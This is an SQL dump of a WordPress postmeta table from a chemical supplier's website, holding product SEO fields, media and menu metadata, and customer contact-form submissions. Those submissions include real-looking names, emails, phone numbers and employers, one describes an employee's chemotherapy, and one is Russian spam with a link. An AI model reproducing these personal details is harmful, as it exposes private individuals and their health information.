INSERT INTO `wp_postmeta` VALUES (38552, 4402, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (38553, 4402, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (38554, 4402, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (38555, 4402, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (38556, 4402, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (38557, 4402, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (38558, 4402, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (38559, 4402, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (38560, 4402, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (38561, 4402, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (38562, 4402, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (38563, 4402, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (38564, 4402, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (38565, 4402, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (38566, 4402, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (38567, 4402, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (38568, 4402, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (38569, 4402, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (38570, 4402, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (38571, 4402, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (38572, 4402, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (38573, 4402, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (38574, 4402, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (38575, 4402, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (38576, 4402, '_ywtm_content_tab_description', '<h2>ReleaSys RM | Rotational Molding Release Agent</h2>\r\n<h3>Proprietary Chemistry; Exceptional Longevity, Ease of Release, and Surface Quality</h3>\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (38577, 4402, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (38578, 4402, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (38579, 4402, '_yoast_wpseo_primary_product_cat', '529'); 
INSERT INTO `wp_postmeta` VALUES (38580, 4402, '_yoast_wpseo_focuskw_text_input', 'Rotational Molding Release Agent'); 
INSERT INTO `wp_postmeta` VALUES (38581, 4402, '_yoast_wpseo_focuskw', 'Rotational Molding Release Agent'); 
INSERT INTO `wp_postmeta` VALUES (38582, 4402, '_yoast_wpseo_title', 'ReleaSys RM | Rotational Molding Release Agent | Rotomolding | Miller-Stephenson'); 
INSERT INTO `wp_postmeta` VALUES (38583, 4402, '_yoast_wpseo_metadesc', 'ReleaSys RM Rotational Molding Release Agent, provides superior resin flow, no transfer, multiple releases and increased productivity. Heat Stable.'); 
INSERT INTO `wp_postmeta` VALUES (38584, 4402, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (38585, 4402, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (38586, 4406, '_wp_attached_file', '2017/06/shutterstock_551871304.jpg'); 
INSERT INTO `wp_postmeta` VALUES (38587, 4406, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:34:"2017/06/shutterstock_551871304.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_551871304-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_551871304-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_551871304-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_551871304-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_551871304-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_551871304-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_551871304-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (38588, 4402, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (38589, 4409, '_wp_attached_file', '2017/06/palatialhouse-tofu-1.mp4'); 
INSERT INTO `wp_postmeta` VALUES (38590, 4409, '_wp_attachment_metadata', 'a:9:{s:8:"filesize";i:2077123;s:9:"mime_type";s:15:"video/quicktime";s:6:"length";i:18;s:16:"length_formatted";s:4:"0:18";s:5:"width";i:1280;s:6:"height";i:720;s:10:"fileformat";s:3:"mp4";s:10:"dataformat";s:9:"quicktime";s:5:"audio";a:7:{s:10:"dataformat";s:3:"mp4";s:5:"codec";s:19:"ISO/IEC 14496-3 AAC";s:11:"sample_rate";d:48000;s:8:"channels";i:2;s:15:"bits_per_sample";i:16;s:8:"lossless";b:0;s:11:"channelmode";s:6:"stereo";}}'); 
INSERT INTO `wp_postmeta` VALUES (38591, 4416, '_edit_lock', '1496342894:2'); 
INSERT INTO `wp_postmeta` VALUES (38592, 4416, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (38593, 4416, '_footer', 'normal'); 
INSERT INTO `wp_postmeta` VALUES (38594, 4416, '_wp_page_template', 'default'); 
INSERT INTO `wp_postmeta` VALUES (38595, 4416, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (38596, 4416, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (38597, 4416, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (38598, 4416, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (38599, 4420, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (38600, 4420, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (38601, 4420, '_menu_item_type', 'post_type'); 
INSERT INTO `wp_postmeta` VALUES (38602, 4420, '_menu_item_menu_item_parent', '0'); 
INSERT INTO `wp_postmeta` VALUES (38603, 4420, '_menu_item_object_id', '4416'); 
INSERT INTO `wp_postmeta` VALUES (38604, 4420, '_menu_item_object', 'page'); 
INSERT INTO `wp_postmeta` VALUES (38605, 4420, '_menu_item_target', ''); 
INSERT INTO `wp_postmeta` VALUES (38606, 4420, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (38607, 4420, '_menu_item_xfn', ''); 
INSERT INTO `wp_postmeta` VALUES (38608, 4420, '_menu_item_url', ''); 
INSERT INTO `wp_postmeta` VALUES (38609, 4416, '_yoast_wpseo_meta-robots-nofollow', '1'); 
INSERT INTO `wp_postmeta` VALUES (38610, 204, '_oembed_97120786a5d618011442f73be26e093f', '<iframe width="1020" height="574" src="https://www.youtube.com/embed/AoPiLg8DZ3A?feature=oembed" frameborder="0" allowfullscreen></iframe>'); 
INSERT INTO `wp_postmeta` VALUES (38611, 204, '_oembed_time_97120786a5d618011442f73be26e093f', '1496344726'); 
INSERT INTO `wp_postmeta` VALUES (38612, 204, '_oembed_508fec1cde1396f025869c71421fba2b', '<iframe width="1020" height="574" src="https://www.youtube.com/embed/tbzqYPsuauI?feature=oembed" frameborder="0" allowfullscreen></iframe>'); 
INSERT INTO `wp_postmeta` VALUES (38613, 204, '_oembed_time_508fec1cde1396f025869c71421fba2b', '1496344751'); 
INSERT INTO `wp_postmeta` VALUES (38614, 4422, '_wp_attached_file', '2017/06/Miller-Stephenson-Promo.mp4'); 
INSERT INTO `wp_postmeta` VALUES (38615, 4422, '_wp_attachment_metadata', 'a:9:{s:8:"filesize";i:14837989;s:9:"mime_type";s:15:"video/quicktime";s:6:"length";i:82;s:16:"length_formatted";s:4:"1:22";s:5:"width";i:1280;s:6:"height";i:720;s:10:"fileformat";s:3:"mp4";s:10:"dataformat";s:9:"quicktime";s:5:"audio";a:7:{s:10:"dataformat";s:3:"mp4";s:5:"codec";s:19:"ISO/IEC 14496-3 AAC";s:11:"sample_rate";d:48000;s:8:"channels";i:2;s:15:"bits_per_sample";i:16;s:8:"lossless";b:0;s:11:"channelmode";s:6:"stereo";}}'); 
INSERT INTO `wp_postmeta` VALUES (38617, 4426, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (38618, 4426, '_seq_num', '692'); 
INSERT INTO `wp_postmeta` VALUES (38619, 4426, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38620, 4426, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (38621, 4426, '_field_1', 'Michael Buzecky'); 
INSERT INTO `wp_postmeta` VALUES (38622, 4426, '_field_10', 'Catalent Pharma Solutions'); 
INSERT INTO `wp_postmeta` VALUES (38623, 4426, '_field_2', 'michael.buzecky@catalent.com'); 
INSERT INTO `wp_postmeta` VALUES (38624, 4426, '_field_8', '(815) 206-1263'); 
INSERT INTO `wp_postmeta` VALUES (38625, 4426, '_field_3', 'I am looking for a certificate of compliance to NSF H-1 standards and BSE/TSE compliance (EMEA/410/01) for Krytox GPL 206.  The product is being suggested by a vendor and I need to have documentation to certify compliance.\nThank you.'); 
INSERT INTO `wp_postmeta` VALUES (38626, 4426, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (38627, 4426, '_sub_id', '4426'); 
INSERT INTO `wp_postmeta` VALUES (38628, 4427, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (38629, 4427, '_seq_num', '693'); 
INSERT INTO `wp_postmeta` VALUES (38630, 4427, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38631, 4427, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (38632, 4427, '_field_1', 'Eddie Hofer'); 
INSERT INTO `wp_postmeta` VALUES (38633, 4427, '_field_10', 'Rockwell Collins'); 
INSERT INTO `wp_postmeta` VALUES (38634, 4427, '_field_2', 'eddie.hofer@rockwellcollins.com'); 
INSERT INTO `wp_postmeta` VALUES (38635, 4427, '_field_8', '(319) 295-6350'); 
INSERT INTO `wp_postmeta` VALUES (38636, 4427, '_field_3', 'Wondering if you have suggestions on how to remove set dry film lubricant on hardware items.  Is there a solvent which can readily remove the material (not 100% certain on type of dry film lubricant).  Any suggestions would be appreciated.\r\n\r\nThanks!\r\nEddie'); 
INSERT INTO `wp_postmeta` VALUES (38637, 4427, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (38638, 4427, '_sub_id', '4427'); 
INSERT INTO `wp_postmeta` VALUES (38639, 4430, '_wp_attached_file', '2017/06/shutterstock_525972979.jpg'); 
INSERT INTO `wp_postmeta` VALUES (38640, 4430, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:662;s:4:"file";s:34:"2017/06/shutterstock_525972979.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_525972979-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_525972979-800x530.jpg";s:5:"width";i:800;s:6:"height";i:530;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_525972979-768x508.jpg";s:5:"width";i:768;s:6:"height";i:508;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_525972979-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_525972979-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_525972979-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_525972979-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (38641, 4433, '_menu_item_type', 'custom'); 
INSERT INTO `wp_postmeta` VALUES (38642, 4433, '_menu_item_menu_item_parent', '131'); 
INSERT INTO `wp_postmeta` VALUES (38643, 4433, '_menu_item_object_id', '4433'); 
INSERT INTO `wp_postmeta` VALUES (38644, 4433, '_menu_item_object', 'custom'); 
INSERT INTO `wp_postmeta` VALUES (38645, 4433, '_menu_item_target', ''); 
INSERT INTO `wp_postmeta` VALUES (38646, 4433, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (38647, 4433, '_menu_item_xfn', ''); 
INSERT INTO `wp_postmeta` VALUES (38648, 4433, '_menu_item_url', 'https://www.miller-stephenson.com/chemicals/lubricants/'); 
INSERT INTO `wp_postmeta` VALUES (38650, 4434, '_menu_item_type', 'custom'); 
INSERT INTO `wp_postmeta` VALUES (38651, 4434, '_menu_item_menu_item_parent', '131'); 
INSERT INTO `wp_postmeta` VALUES (38652, 4434, '_menu_item_object_id', '4434'); 
INSERT INTO `wp_postmeta` VALUES (38653, 4434, '_menu_item_object', 'custom'); 
INSERT INTO `wp_postmeta` VALUES (38654, 4434, '_menu_item_target', ''); 
INSERT INTO `wp_postmeta` VALUES (38655, 4434, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (38656, 4434, '_menu_item_xfn', ''); 
INSERT INTO `wp_postmeta` VALUES (38657, 4434, '_menu_item_url', 'https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/'); 
INSERT INTO `wp_postmeta` VALUES (38659, 4435, '_menu_item_type', 'custom'); 
INSERT INTO `wp_postmeta` VALUES (38660, 4435, '_menu_item_menu_item_parent', '131'); 
INSERT INTO `wp_postmeta` VALUES (38661, 4435, '_menu_item_object_id', '4435'); 
INSERT INTO `wp_postmeta` VALUES (38662, 4435, '_menu_item_object', 'custom'); 
INSERT INTO `wp_postmeta` VALUES (38663, 4435, '_menu_item_target', ''); 
INSERT INTO `wp_postmeta` VALUES (38664, 4435, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (38665, 4435, '_menu_item_xfn', ''); 
INSERT INTO `wp_postmeta` VALUES (38666, 4435, '_menu_item_url', 'https://www.miller-stephenson.com/chemicals/conformal-coating/'); 
INSERT INTO `wp_postmeta` VALUES (38668, 4436, '_menu_item_type', 'custom'); 
INSERT INTO `wp_postmeta` VALUES (38669, 4436, '_menu_item_menu_item_parent', '131'); 
INSERT INTO `wp_postmeta` VALUES (38670, 4436, '_menu_item_object_id', '4436'); 
INSERT INTO `wp_postmeta` VALUES (38671, 4436, '_menu_item_object', 'custom'); 
INSERT INTO `wp_postmeta` VALUES (38672, 4436, '_menu_item_target', ''); 
INSERT INTO `wp_postmeta` VALUES (38673, 4436, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (38674, 4436, '_menu_item_xfn', ''); 
INSERT INTO `wp_postmeta` VALUES (38675, 4436, '_menu_item_url', 'https://www.miller-stephenson.com/chemicals/conformal-coating/'); 
INSERT INTO `wp_postmeta` VALUES (38677, 4437, '_menu_item_type', 'custom'); 
INSERT INTO `wp_postmeta` VALUES (38678, 4437, '_menu_item_menu_item_parent', '131'); 
INSERT INTO `wp_postmeta` VALUES (38679, 4437, '_menu_item_object_id', '4437'); 
INSERT INTO `wp_postmeta` VALUES (38680, 4437, '_menu_item_object', 'custom'); 
INSERT INTO `wp_postmeta` VALUES (38681, 4437, '_menu_item_target', ''); 
INSERT INTO `wp_postmeta` VALUES (38682, 4437, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (38683, 4437, '_menu_item_xfn', ''); 
INSERT INTO `wp_postmeta` VALUES (38684, 4437, '_menu_item_url', 'https://www.miller-stephenson.com/chemicals/medical-chemicals/'); 
INSERT INTO `wp_postmeta` VALUES (38686, 4438, '_menu_item_type', 'custom'); 
INSERT INTO `wp_postmeta` VALUES (38687, 4438, '_menu_item_menu_item_parent', '131'); 
INSERT INTO `wp_postmeta` VALUES (38688, 4438, '_menu_item_object_id', '4438'); 
INSERT INTO `wp_postmeta` VALUES (38689, 4438, '_menu_item_object', 'custom'); 
INSERT INTO `wp_postmeta` VALUES (38690, 4438, '_menu_item_target', ''); 
INSERT INTO `wp_postmeta` VALUES (38691, 4438, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (38692, 4438, '_menu_item_xfn', ''); 
INSERT INTO `wp_postmeta` VALUES (38693, 4438, '_menu_item_url', 'https://www.miller-stephenson.com/chemicals/vazo-radical-initiators/'); 
INSERT INTO `wp_postmeta` VALUES (38695, 4439, '_menu_item_type', 'custom'); 
INSERT INTO `wp_postmeta` VALUES (38696, 4439, '_menu_item_menu_item_parent', '131'); 
INSERT INTO `wp_postmeta` VALUES (38697, 4439, '_menu_item_object_id', '4439'); 
INSERT INTO `wp_postmeta` VALUES (38698, 4439, '_menu_item_object', 'custom'); 
INSERT INTO `wp_postmeta` VALUES (38699, 4439, '_menu_item_target', ''); 
INSERT INTO `wp_postmeta` VALUES (38700, 4439, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (38701, 4439, '_menu_item_xfn', ''); 
INSERT INTO `wp_postmeta` VALUES (38702, 4439, '_menu_item_url', 'https://www.miller-stephenson.com/chemicals/mold-release-agents/'); 
INSERT INTO `wp_postmeta` VALUES (38704, 4441, '_menu_item_type', 'custom'); 
INSERT INTO `wp_postmeta` VALUES (38705, 4441, '_menu_item_menu_item_parent', '131'); 
INSERT INTO `wp_postmeta` VALUES (38706, 4441, '_menu_item_object_id', '4441'); 
INSERT INTO `wp_postmeta` VALUES (38707, 4441, '_menu_item_object', 'custom'); 
INSERT INTO `wp_postmeta` VALUES (38708, 4441, '_menu_item_target', ''); 
INSERT INTO `wp_postmeta` VALUES (38709, 4441, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (38710, 4441, '_menu_item_xfn', ''); 
INSERT INTO `wp_postmeta` VALUES (38711, 4441, '_menu_item_url', 'https://www.miller-stephenson.com/chemicals/specialty-products/'); 
INSERT INTO `wp_postmeta` VALUES (38713, 4442, '_menu_item_type', 'custom'); 
INSERT INTO `wp_postmeta` VALUES (38714, 4442, '_menu_item_menu_item_parent', '131'); 
INSERT INTO `wp_postmeta` VALUES (38715, 4442, '_menu_item_object_id', '4442'); 
INSERT INTO `wp_postmeta` VALUES (38716, 4442, '_menu_item_object', 'custom'); 
INSERT INTO `wp_postmeta` VALUES (38717, 4442, '_menu_item_target', ''); 
INSERT INTO `wp_postmeta` VALUES (38718, 4442, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (38719, 4442, '_menu_item_xfn', ''); 
INSERT INTO `wp_postmeta` VALUES (38720, 4442, '_menu_item_url', 'https://www.miller-stephenson.com/chemicals/solvents/'); 
INSERT INTO `wp_postmeta` VALUES (38722, 4443, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (38723, 4443, '_seq_num', '308'); 
INSERT INTO `wp_postmeta` VALUES (38724, 4443, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38725, 4443, '_field_12', 'Vicki Wildman'); 
INSERT INTO `wp_postmeta` VALUES (38726, 4443, '_field_13', 'Pynco, Inc.'); 
INSERT INTO `wp_postmeta` VALUES (38727, 4443, '_field_18', '2663395'); 
INSERT INTO `wp_postmeta` VALUES (38728, 4443, '_field_14', 'vicki@pynco.com'); 
INSERT INTO `wp_postmeta` VALUES (38729, 4443, '_field_15', '(812) 275-0090'); 
INSERT INTO `wp_postmeta` VALUES (38730, 4443, '_field_16', 'We presently use MS-557 in for cleaning glass optical filters in our production area. We have one staff member who is presently undergoing chemotherapy and has developed a reaction to this item.  Does Miller-Stephenson have another product that could be used by this employee to clean epoxy residue and stains from glass and filters that contains different chemicals than those in  MS-557.  Our employee has been using the product with vinyl gloves as she is also latex intolerant. I am exploring options which would allow her to continue working in the capacity that she has until treatments are completed. If a different type of glove could be used, this also may be an option.  We are pleased with the quality of your products used in production. For this case we are seeking an alternative.  Working is beneficial to this employee&#039;s mental health as she continues her treatments. Thank You. Vicki Wildman'); 
INSERT INTO `wp_postmeta` VALUES (38731, 4443, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (38732, 4443, '_sub_id', '4443'); 
INSERT INTO `wp_postmeta` VALUES (38733, 4444, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (38734, 4444, '_seq_num', '309'); 
INSERT INTO `wp_postmeta` VALUES (38735, 4444, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38736, 4444, '_field_12', 'Malachy Griffey'); 
INSERT INTO `wp_postmeta` VALUES (38737, 4444, '_field_13', 'Haas Group International Ireland'); 
INSERT INTO `wp_postmeta` VALUES (38738, 4444, '_field_18', 'not with Haas Ireland'); 
INSERT INTO `wp_postmeta` VALUES (38739, 4444, '_field_14', 'malachy.griffey@wescoair.com'); 
INSERT INTO `wp_postmeta` VALUES (38740, 4444, '_field_15', '(353) 617-1909'); 
INSERT INTO `wp_postmeta` VALUES (38741, 4444, '_field_16', 'Please advise the closest product you have to the obsolete MS122RB \r\n\r\nMany Thanks\r\n(as we are in Ireland, phone no. is international +353 61 719099 , field above dosent take it fully)\r\n'); 
INSERT INTO `wp_postmeta` VALUES (38742, 4444, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (38743, 4444, '_sub_id', '4444'); 
INSERT INTO `wp_postmeta` VALUES (38790, 4446, 'control_id', 'tt-font-71'); 
INSERT INTO `wp_postmeta` VALUES (38791, 4446, 'control_selectors', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (38792, 4446, 'control_description', ''); 
INSERT INTO `wp_postmeta` VALUES (38793, 4446, 'force_styles', ''); 
INSERT INTO `wp_postmeta` VALUES (38794, 4447, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (38795, 4447, '_seq_num', '694'); 
INSERT INTO `wp_postmeta` VALUES (38796, 4447, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38797, 4447, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (38798, 4447, '_field_1', 'Pila Suarez'); 
INSERT INTO `wp_postmeta` VALUES (38799, 4447, '_field_10', 'Texas A&amp;M University'); 
INSERT INTO `wp_postmeta` VALUES (38800, 4447, '_field_2', 'p.suarez_27@tamu.edu'); 
INSERT INTO `wp_postmeta` VALUES (38801, 4447, '_field_8', '(979) 703-9369'); 
INSERT INTO `wp_postmeta` VALUES (38802, 4447, '_field_3', 'Hi!\r\nI am planning on preparing polymer films (L: 20 mm, W: 3 - 6 mm, T: 0.5- 2 mm) through compression molding. I am looking for a release agent that will not transfer to my final product (films). My mold is made from 316 stainless steel, which release agent would you recommend?\r\nThanks in advance.\r\nRegards,\r\nPilar'); 
INSERT INTO `wp_postmeta` VALUES (38803, 4447, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (38804, 4447, '_sub_id', '4447'); 
INSERT INTO `wp_postmeta` VALUES (38805, 4448, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (38806, 4448, '_seq_num', '695'); 
INSERT INTO `wp_postmeta` VALUES (38807, 4448, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38808, 4448, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (38809, 4448, '_field_1', 'KerdiaGroumWO'); 
INSERT INTO `wp_postmeta` VALUES (38810, 4448, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (38811, 4448, '_field_2', 'teterevkovadina2@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (38812, 4448, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (38813, 4448, '_field_3', 'В какие online игры следует поиграть в этом году ? \r\n \r\nЛюди, что в детском возрасте любили красочные браузерные online игрушки, к сорока пяти годам скорее всего отстают от динамики рынка и не способны понять, в какие компьютерные игры стоит играть в настоящий период времени. Указанная статья была создана для старожилов, что захотели вспомнить детство и поиграть в качественную онлайн игрушку. Давайте рассмотрим группу самых интригующих игровых проектов! \r\n \r\n&lt;a href=&quot;https://mmog-play.ru/stuff/novinki_onlajn_igr/4&quot;&gt;новинки онлайн игр&lt;/a&gt; , позволит вам уже спустя пару минут приступить к развитию собственного персонажа и уйти на битву с другими игроками в режиме PvP.'); 
INSERT INTO `wp_postmeta` VALUES (38814, 4448, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (38815, 4448, '_sub_id', '4448'); 
INSERT INTO `wp_postmeta` VALUES (38817, 4454, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (38818, 4454, '_seq_num', '696'); 
INSERT INTO `wp_postmeta` VALUES (38819, 4454, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38820, 4454, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (38821, 4454, '_field_1', 'David LeCave'); 
INSERT INTO `wp_postmeta` VALUES (38822, 4454, '_field_10', 'Ameriacn Panel Corp.'); 
INSERT INTO `wp_postmeta` VALUES (38823, 4454, '_field_2', 'dlecave@ameriacn-panel.com'); 
INSERT INTO `wp_postmeta` VALUES (38824, 4454, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (38825, 4454, '_field_3', 'Does Miller Stephenson make a mold release suitable for for use with acrylic base gel type adhesive?  Our fixtures are aluminum and process temperatures are from room temp to max. 60 deg. C.  \r\nThank you.'); 
INSERT INTO `wp_postmeta` VALUES (38826, 4454, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (38827, 4454, '_sub_id', '4454'); 
INSERT INTO `wp_postmeta` VALUES (38828, 4455, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (38829, 4455, '_seq_num', '697'); 
INSERT INTO `wp_postmeta` VALUES (38830, 4455, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38831, 4455, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (38832, 4455, '_field_1', 'Elizabeth'); 
INSERT INTO `wp_postmeta` VALUES (38833, 4455, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (38834, 4455, '_field_2', 'elizabeth.m.lam@boeing.com'); 
INSERT INTO `wp_postmeta` VALUES (38835, 4455, '_field_8', ''); 
